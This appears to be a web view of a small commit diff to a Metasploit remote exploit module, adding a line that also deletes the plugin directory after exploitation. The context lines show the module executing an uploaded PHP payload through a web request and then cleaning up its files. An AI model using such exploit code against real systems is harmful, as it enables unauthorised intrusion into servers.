remove plugin dir
parent
eb8429cbd3
commit
2f9eebe28b
|
@ -96,6 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
print_status("Executing the payload at #{payload_uri}...")
|
||||
register_files_for_cleanup("#{payload_name}.php")
|
||||
register_files_for_cleanup("#{plugin_name}.php")
|
||||
register_dir_for_cleanup("../#{plugin_name}")
|
||||
send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue